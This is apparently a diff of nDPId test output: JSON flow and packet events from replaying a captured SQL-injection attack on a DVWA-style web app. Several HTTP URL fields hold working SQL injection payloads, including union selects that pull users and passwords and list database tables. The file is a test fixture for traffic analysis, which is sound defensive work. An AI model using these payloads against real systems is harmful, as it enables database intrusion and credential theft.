-01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348467295,"flow_last_seen":1499348467296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1499348467296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+user%2C+password+from+users%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348480992,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348480992,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IqhAAD4GoyisEAABwKgKMo1uAFBrxY9uAAAAAKACchAnDQAAAgQFtAQCCAoBPq3GAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499348480992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348480992,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjW5ct+zHa8WPb6AScSBbSwAAAgQFtAQCCAoD6H85AT6txgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348480993,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IqlAAD4Goy+sEAABwKgKMo1uAFBrxY9vXLfsyIAQAOX6UQAAAQEICgE+rccD6H85"} 
-00994{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348480992,"flow_last_seen":1499348480993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":523,"flow_tot_l4_payload_len":523,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1499348480993,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348494345,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348494345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SndAAD4Ge1msEAABwKgKMo1wAFAblvCmAAAAAKACchAI9wAAAgQFtAQCCAoBPrrRAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499348494345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348494345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXBGdqbdG5bwp6AScSCMVgAAAgQFtAQCCAoD6IxDAT660QEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348494346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SnhAAD4Ge2CsEAABwKgKMo1wAFAblvCnRnam3oAQAOUrXgAAAQEICgE+utED6IxD"} 
-01007{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348494345,"flow_last_seen":1499348494346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":536,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348494346,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348506489,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348506489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gghAAD4GQ8isEAABwKgKMo1yAFDHw0SlAAAAAKACchD87AAAAgQFtAQCCAoBPsatAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499348506489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348506489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXIW0CP4x8NEpqAScSAm\/AAAAgQFtAQCCAoD6JgfAT7GrQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348506490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gglAAD4GQ8+sEAABwKgKMo1yAFDHw0SmFtAj+YAQAOXGAwAAAQEICgE+xq0D6Jgf"} 
-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348506489,"flow_last_seen":1499348506490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":537,"flow_tot_l4_payload_len":537,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1499348506490,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+database%28%29%2C+user%28%29%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348514064,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348514064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tHhAAD4GEVisEAABwKgKMo10AFC7kHpqAAAAAKACchDL8wAAAgQFtAQCCAoBPs4SAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499348514064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348514064,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjXSy4nMxu5B6a6AScSADUQAAAgQFtAQCCAoD6J+FAT7OEgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348514065,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tHlAAD4GEV+sEAABwKgKMo10AFC7kHprsuJzMoAQAOWiVwAAAQEICgE+zhMD6J+F"} 
-01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348407419,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348407419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA84aRAAD4G5CusEAABwKgKMo1kAFAWk4RJAAAAAKACchDPRwAAAgQFtAQCCAoBPmXtAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499348407419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348407419,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWS7EzBkFpOESqAScSCpZgAAAgQFtAQCCAoD6DdgAT5l7QEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499348407420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348407420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA04aVAAD4G5DKsEAABwKgKMo1kAFAWk4RKuxMwZYAQAOVIbgAAAQEICgE+Ze0D6Ddg"} +00993{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348407419,"flow_last_seen":1499348407420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1499348407420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348413192,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348413192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/kNAAD4Gx4ysEAABwKgKMo1mAFAV3ZXTAAAAAKACchC4zgAAAgQFtAQCCAoBPmuQAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499348413192,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348413192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQjWbwopjJFd2V1KAScSDvVQAAAgQFtAQCCAoD6D0DAT5rkAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499348413193,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348413193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/kRAAD4Gx5OsEAABwKgKMo1mAFAV3ZXU8KKYyoAQAOWOXQAAAQEICgE+a5AD6D0D"} 